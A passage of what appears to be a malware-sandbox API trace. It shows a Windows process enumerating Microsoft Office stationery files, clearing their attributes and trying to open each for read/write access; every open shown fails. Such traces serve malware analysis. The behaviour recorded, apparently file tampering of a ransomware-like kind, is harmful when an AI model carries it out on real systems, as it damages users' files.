VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.825] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", dwFileAttributes=0x80) returned 0 [0131.826] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.826] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.826] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.826] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.826] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.826] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif", dwFileAttributes=0x80) returned 0 [0131.826] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.826] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.826] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.826] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.826] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.827] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif", dwFileAttributes=0x80) returned 0 [0131.827] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.827] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.827] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.827] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.827] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.827] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.827] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf", dwFileAttributes=0x80) returned 0 [0131.827] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.827] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.827] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.827] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.828] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.828] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", dwFileAttributes=0x80) returned 0 [0131.828] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.828] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.828] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.828] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.828] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.828] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", dwFileAttributes=0x80) returned 0 [0131.828] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.828] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.829] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.829] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.829] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.829] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf", dwFileAttributes=0x80) returned 0 [0131.829] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.830] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.830] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.830] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.830] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.830] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf", dwFileAttributes=0x80) returned 0 [0131.830] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.830] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.830] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.830] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.830] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.830] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf", dwFileAttributes=0x80) returned 0 [0131.831] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.831] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.831] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.831] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.831] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.832] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", dwFileAttributes=0x80) returned 0 [0131.832] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.832] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.832] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.832] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.832] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.833] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", dwFileAttributes=0x80) returned 0 [0131.833] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.833] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.833] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.833] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.833] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.833] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf", dwFileAttributes=0x80) returned 0 [0131.833] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.833] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.833] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.834] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.834] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.834] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf", dwFileAttributes=0x80) returned 0 [0131.834] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.834] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.834] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.834] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.834] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.834] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", dwFileAttributes=0x80) returned 0 [0131.835] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.835] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.835] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.835] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.835] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.835] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", dwFileAttributes=0x80) returned 0 [0131.835] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.836] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.836] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.836] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.836] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.836] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf", dwFileAttributes=0x80) returned 0 [0131.837] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.837] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.837] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.837] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.837] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.837] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", dwFileAttributes=0x80) returned 0 [0131.837] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.837] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.837] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.837] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.837] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.838] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf", dwFileAttributes=0x80) returned 0 [0131.838] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.838] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.838] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.838] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.838] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.838] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf", dwFileAttributes=0x80) returned 0 [0131.839] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.839] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.839] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.839] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.839] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.839] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", dwFileAttributes=0x80) returned 0 [0131.840] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.840] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.840] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.840] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.840] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.840] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm", dwFileAttributes=0x80) returned 0 [0131.840] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.840] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.840] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.841] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.841] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.841] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg", dwFileAttributes=0x80) returned 0 [0131.841] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.841] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.841] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.841] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.841] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.841] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm", dwFileAttributes=0x80) returned 0 [0131.842] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.842] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.842] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.842] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.842] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.842] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg", dwFileAttributes=0x80) returned 0 [0131.843] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.843] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.843] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.843] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.843] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.844] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg", dwFileAttributes=0x80) returned 0 [0131.844] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.844] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.844] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.844] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.844] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.844] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg", dwFileAttributes=0x80) returned 0 [0131.844] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.844] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.844] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.844] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.844] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.845] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg", dwFileAttributes=0x80) returned 0 [0131.845] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.845] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.845] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.845] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.846] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.846] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm", dwFileAttributes=0x80) returned 0 [0131.846] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.846] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.846] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.847] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.847] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.847] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg", dwFileAttributes=0x80) returned 0 [0131.847] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.847] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.847] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.848] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.848] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.848] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg", dwFileAttributes=0x80) returned 0 [0131.848] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.848] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.848] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.848] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.848] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, 